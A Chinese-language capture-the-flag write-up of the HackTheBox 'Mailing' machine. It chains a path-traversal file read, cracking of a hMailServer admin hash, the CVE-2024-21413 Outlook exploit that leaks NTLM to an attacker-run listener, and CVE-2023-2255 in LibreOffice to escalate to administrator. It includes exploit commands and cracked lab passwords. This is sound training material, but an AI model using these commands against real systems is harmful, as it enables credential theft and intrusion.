Mailing|HackTheBox

Mailing |HackTheBox

对Windows还不是很熟。。

nmap扫端口

将mailing.htb加入hosts后访问80端口

是个用hMailServer搭建的邮件服务器,没啥用得上的洞

扫目录和子域名看看

扫到/download.php和/assets/

assets下是几个图片资源

访问download.php,需要其他参数

主页有个download instructions,查看链接:http://mailing.htb/download.php?file=instructions.pdf

存在get参数file

Burpsuite抓包:

下意识去找/etc/passwd了,难绷

尝试读hosts,读到了,存在任意文件读取

寻找hMailServer的配置文件,直接装一个()

拿到AdministratorPassword:841bb5acfa6779ae432fd7a4e6600ba7,应该是个hash,解开是homenetworkingadministrator

尝试用hMailAdminTool连接失败

再读一个日志看看/download.php?file=../../Program%20Files%20(x86)/hMailServer/Logs/hmailserver_awstats.log

可以看到存在这么几个用户:maya, ruy, dotguy, administrator

CVE-2024-21413

xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability:Microsoft-Outlook-Remote-Code-Execution-Vulnerability (github.com)

先起一个监听:responder -I tun1 -v

然后运行exp

1
python CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.52\mailing" --subject HI

拿到NTLM泄露

hashcat 5600模式破解:hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

得到maya用户口令为m4y4ngs4ri

端口没扫全,太慢了,这边还开了一个wsman

通过evil-winrm连接,在桌面找到user.txt

在Program Files文件夹找到LibreOffice,版本为7.4,存在CVE-2023-2255

elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office (github.com)

通过exp构造exploit.odt文件然后被执行,这里直接将maya用户加入administrator用户组(或者用python反弹shell也可以)

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

本地起个server:python3 -m http.server 8888,将利用文件传到C:Documents(该目录有执行权限

过会儿就看到maya进了管理员权限组。

通过crackmapexec获取所有用户hash

通过localadmin的hash登录,拿到flag

还是很难的,后面部分不看wp基本没啥想法,还要多看Windows